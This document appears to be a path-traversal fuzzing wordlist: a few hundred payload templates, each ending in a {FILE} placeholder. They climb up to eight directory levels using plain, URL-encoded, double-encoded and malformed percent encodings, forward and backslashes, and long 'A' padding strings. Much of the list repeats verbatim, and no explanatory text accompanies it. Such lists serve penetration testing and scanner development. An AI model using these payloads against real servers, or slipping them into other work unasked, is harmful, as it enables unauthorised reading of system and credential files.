%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/{FILE}<br />
%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/{FILE}<br />
%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/{FILE}<br />
%%32%65%%32%65%%32%66{FILE}<br />
%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66{FILE}<br />
%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66{FILE}<br />
%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66{FILE}<br />
%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66{FILE}<br />
%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66{FILE}<br />
%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66{FILE}<br />
%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66{FILE}<br />
..%%35%63{FILE}<br />
..%%35%63..%%35%63{FILE}<br />
..%%35%63..%%35%63..%%35%63{FILE}<br />
..%%35%63..%%35%63..%%35%63..%%35%63{FILE}<br />
..%%35%63..%%35%63..%%35%63..%%35%63..%%35%63{FILE}<br />
..%%35%63..%%35%63..%%35%63..%%35%63..%%35%63..%%35%63{FILE}<br />
..%%35%63..%%35%63..%%35%63..%%35%63..%%35%63..%%35%63..%%35%63{FILE}<br />
..%%35%63..%%35%63..%%35%63..%%35%63..%%35%63..%%35%63..%%35%63..%%35%63{FILE}<br />
%%32%65%%32%65/{FILE}<br />
%%32%65%%32%65/%%32%65%%32%65/{FILE}<br />
%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/{FILE}<br />
%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/{FILE}<br />
%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/{FILE}<br />
%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/{FILE}<br />
%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/{FILE}<br />
%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/{FILE}<br />
%%32%65%%32%65%%35%63{FILE}<br />
%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63{FILE}<br />
%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63{FILE}<br />
%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63{FILE}<br />
%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63{FILE}<br />
%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63{FILE}<br />
%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63{FILE}<br />
%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63{FILE}<br />
../{FILE}<br />
../../{FILE}<br />
../../../{FILE}<br />
../../../../{FILE}<br />
../../../../../{FILE}<br />
../../../../../../{FILE}<br />
../../../../../../../{FILE}<br />
../../../../../../../../{FILE}<br />
..%2f{FILE}<br />
..%2f..%2f{FILE}<br />
..%2f..%2f..%2f{FILE}<br />
..%2f..%2f..%2f..%2f{FILE}<br />
..%2f..%2f..%2f..%2f..%2f{FILE}<br />
..%2f..%2f..%2f..%2f..%2f..%2f{FILE}<br />
..%2f..%2f..%2f..%2f..%2f..%2f..%2f{FILE}<br />
..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f{FILE}<br />
%2e%2e/{FILE}<br />
%2e%2e/%2e%2e/{FILE}<br />
%2e%2e/%2e%2e/%2e%2e/{FILE}<br />
%2e%2e/%2e%2e/%2e%2e/%2e%2e/{FILE}<br />
%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/{FILE}<br />
%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/{FILE}<br />
%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/{FILE}<br />
%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/{FILE}<br />
%2e%2e%2f{FILE}<br />
%2e%2e%2f%2e%2e%2f{FILE}<br />
%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}<br />
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}<br />
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}<br />
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}<br />
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}<br />
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}<br />
..%252f{FILE}<br />
..%252f..%252f{FILE}<br />
..%252f..%252f..%252f{FILE}<br />
..%252f..%252f..%252f..%252f{FILE}<br />
..%252f..%252f..%252f..%252f..%252f{FILE}<br />
..%252f..%252f..%252f..%252f..%252f..%252f{FILE}<br />
..%252f..%252f..%252f..%252f..%252f..%252f..%252f{FILE}<br />
..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f{FILE}<br />
%252e%252e/{FILE}<br />
%252e%252e/%252e%252e/{FILE}<br />
%252e%252e/%252e%252e/%252e%252e/{FILE}<br />
%252e%252e/%252e%252e/%252e%252e/%252e%252e/{FILE}<br />
%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/{FILE}<br />
%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/{FILE}<br />
%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/{FILE}<br />
%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/{FILE}<br />
%252e%252e%252f{FILE}<br />
%252e%252e%252f%252e%252e%252f{FILE}<br />
%252e%252e%252f%252e%252e%252f%252e%252e%252f{FILE}<br />
%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f{FILE}<br />
%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f{FILE}<br />
%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f{FILE}<br />
%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f{FILE}<br />
%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f{FILE}<br />
..\{FILE}<br />
..\..\{FILE}<br />
..\..\..\{FILE}<br />
..\..\..\..\{FILE}<br />
..\..\..\..\..\{FILE}<br />
..\..\..\..\..\..\{FILE}<br />
..\..\..\..\..\..\..\{FILE}<br />
..\..\..\..\..\..\..\..\{FILE}<br />
..%5c{FILE}<br />
..%5c..%5c{FILE}<br />
..%5c..%5c..%5c{FILE}<br />
..%5c..%5c..%5c..%5c{FILE}<br />
..%5c..%5c..%5c..%5c..%5c{FILE}<br />
..%5c..%5c..%5c..%5c..%5c..%5c{FILE}<br />
..%5c..%5c..%5c..%5c..%5c..%5c..%5c{FILE}<br />
..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c{FILE}<br />
%2e%2e\{FILE}<br />
%2e%2e\%2e%2e\{FILE}<br />
%2e%2e\%2e%2e\%2e%2e\{FILE}<br />
%2e%2e\%2e%2e\%2e%2e\%2e%2e\{FILE}<br />
%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\{FILE}<br />
%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\{FILE}<br />
%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\{FILE}<br />
%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\{FILE}<br />
%2e%2e%5c{FILE}<br />
%2e%2e%5c%2e%2e%5c{FILE}<br />
%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}<br />
%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}<br />
%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}<br />
%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}<br />
%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}<br />
%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}<br />
..%255c{FILE}<br />
..%255c..%255c{FILE}<br />
..%255c..%255c..%255c{FILE}<br />
..%255c..%255c..%255c..%255c{FILE}<br />
..%255c..%255c..%255c..%255c..%255c{FILE}<br />
..%255c..%255c..%255c..%255c..%255c..%255c{FILE}<br />
..%255c..%255c..%255c..%255c..%255c..%255c..%255c{FILE}<br />
..%255c..%255c..%255c..%255c..%255c..%255c..%255c..%255c{FILE}<br />
%252e%252e\{FILE}<br />
%252e%252e\%252e%252e\{FILE}<br />
%252e%252e\%252e%252e\%252e%252e\{FILE}<br />
%252e%252e\%252e%252e\%252e%252e\%252e%252e\{FILE}<br />
%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\{FILE}<br />
%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\{FILE}<br />
%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\{FILE}<br />
%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\{FILE}<br />
%252e%252e%255c{FILE}<br />
%252e%252e%255c%252e%252e%255c{FILE}<br />
%252e%252e%255c%252e%252e%255c%252e%252e%255c{FILE}<br />
%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c{FILE}<br />
%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c{FILE}<br />
%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c{FILE}<br />
%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c{FILE}<br />
%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c{FILE}<br />
../{FILE}<br />
../../{FILE}<br />
../../../{FILE}<br />
../../../../{FILE}<br />
../../../../../{FILE}<br />
../../../../../../{FILE}<br />
../../../../../../../{FILE}<br />
../../../../../../../../{FILE}<br />
..%2f{FILE}<br />
..%2f..%2f{FILE}<br />
..%2f..%2f..%2f{FILE}<br />
..%2f..%2f..%2f..%2f{FILE}<br />
..%2f..%2f..%2f..%2f..%2f{FILE}<br />
..%2f..%2f..%2f..%2f..%2f..%2f{FILE}<br />
..%2f..%2f..%2f..%2f..%2f..%2f..%2f{FILE}<br />
..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f{FILE}<br />
%2e%2e/{FILE}<br />
%2e%2e/%2e%2e/{FILE}<br />
%2e%2e/%2e%2e/%2e%2e/{FILE}<br />
%2e%2e/%2e%2e/%2e%2e/%2e%2e/{FILE}<br />
%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/{FILE}<br />
%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/{FILE}<br />
%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/{FILE}<br />
%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/{FILE}<br />
%2e%2e%2f{FILE}<br />
%2e%2e%2f%2e%2e%2f{FILE}<br />
%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}<br />
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}<br />
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}<br />
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}<br />
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}<br />
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}<br />
..%252f{FILE}<br />
..%252f..%252f{FILE}<br />
..%252f..%252f..%252f{FILE}<br />
..%252f..%252f..%252f..%252f{FILE}<br />
..%252f..%252f..%252f..%252f..%252f{FILE}<br />
..%252f..%252f..%252f..%252f..%252f..%252f{FILE}<br />
..%252f..%252f..%252f..%252f..%252f..%252f..%252f{FILE}<br />
..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f{FILE}<br />
%252e%252e/{FILE}<br />
%252e%252e/%252e%252e/{FILE}<br />
%252e%252e/%252e%252e/%252e%252e/{FILE}<br />
%252e%252e/%252e%252e/%252e%252e/%252e%252e/{FILE}<br />
%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/{FILE}<br />
%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/{FILE}<br />
%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/{FILE}<br />
%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/{FILE}<br />
%252e%252e%252f{FILE}<br />
%252e%252e%252f%252e%252e%252f{FILE}<br />
%252e%252e%252f%252e%252e%252f%252e%252e%252f{FILE}<br />
%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f{FILE}<br />
%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f{FILE}<br />
%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f{FILE}<br />
%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f{FILE}<br />
%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f{FILE}<br />
..\{FILE}<br />
..\..\{FILE}<br />
..\..\..\{FILE}<br />
..\..\..\..\{FILE}<br />
..\..\..\..\..\{FILE}<br />
..\..\..\..\..\..\{FILE}<br />
..\..\..\..\..\..\..\{FILE}<br />
..\..\..\..\..\..\..\..\{FILE}<br />
..%5c{FILE}<br />
..%5c..%5c{FILE}<br />
..%5c..%5c..%5c{FILE}<br />
..%5c..%5c..%5c..%5c{FILE}<br />
..%5c..%5c..%5c..%5c..%5c{FILE}<br />
..%5c..%5c..%5c..%5c..%5c..%5c{FILE}<br />
..%5c..%5c..%5c..%5c..%5c..%5c..%5c{FILE}<br />
..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c{FILE}<br />
%2e%2e\{FILE}<br />
%2e%2e\%2e%2e\{FILE}<br />
%2e%2e\%2e%2e\%2e%2e\{FILE}<br />
%2e%2e\%2e%2e\%2e%2e\%2e%2e\{FILE}<br />
%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\{FILE}<br />
%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\{FILE}<br />
%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\{FILE}<br />
%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\{FILE}<br />
%2e%2e%5c{FILE}<br />
%2e%2e%5c%2e%2e%5c{FILE}<br />
%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}<br />
%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}<br />
%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}<br />
%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}<br />
%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}<br />
%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}<br />
..%255c{FILE}<br />
..%255c..%255c{FILE}<br />
..%255c..%255c..%255c{FILE}<br />
..%255c..%255c..%255c..%255c{FILE}<br />
..%255c..%255c..%255c..%255c..%255c{FILE}<br />
..%255c..%255c..%255c..%255c..%255c..%255c{FILE}<br />
..%255c..%255c..%255c..%255c..%255c..%255c..%255c{FILE}<br />
..%255c..%255c..%255c..%255c..%255c..%255c..%255c..%255c{FILE}<br />
%252e%252e\{FILE}<br />
%252e%252e\%252e%252e\{FILE}<br />
%252e%252e\%252e%252e\%252e%252e\{FILE}<br />
%252e%252e\%252e%252e\%252e%252e\%252e%252e\{FILE}<br />
%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\{FILE}<br />
%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\{FILE}<br />
%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\{FILE}<br />
%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\{FILE}<br />
%252e%252e%255c{FILE}<br />
%252e%252e%255c%252e%252e%255c{FILE}<br />
%252e%252e%255c%252e%252e%255c%252e%252e%255c{FILE}<br />
%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c{FILE}<br />
%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c{FILE}<br />
%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c{FILE}<br />
%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c{FILE}<br />
%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c{FILE}<br />
\../{FILE}<br />
\../\../{FILE}<br />
\../\../\../{FILE}<br />
\../\../\../\../{FILE}<br />
\../\../\../\../\../{FILE}<br />
\../\../\../\../\../\../{FILE}<br />
\../\../\../\../\../\../\../{FILE}<br />
\../\../\../\../\../\../\../\../{FILE}<br />
/..\{FILE}<br />
/..\/..\{FILE}<br />
/..\/..\/..\{FILE}<br />
/..\/..\/..\/..\{FILE}<br />
/..\/..\/..\/..\/..\{FILE}<br />
/..\/..\/..\/..\/..\/..\{FILE}<br />
/..\/..\/..\/..\/..\/..\/..\{FILE}<br />
/..\/..\/..\/..\/..\/..\/..\/..\{FILE}<br />
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA/../{FILE}<br />
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA/../../{FILE}<br />
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA/../../../{FILE}<br />
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA/../../../../{FILE}<br />
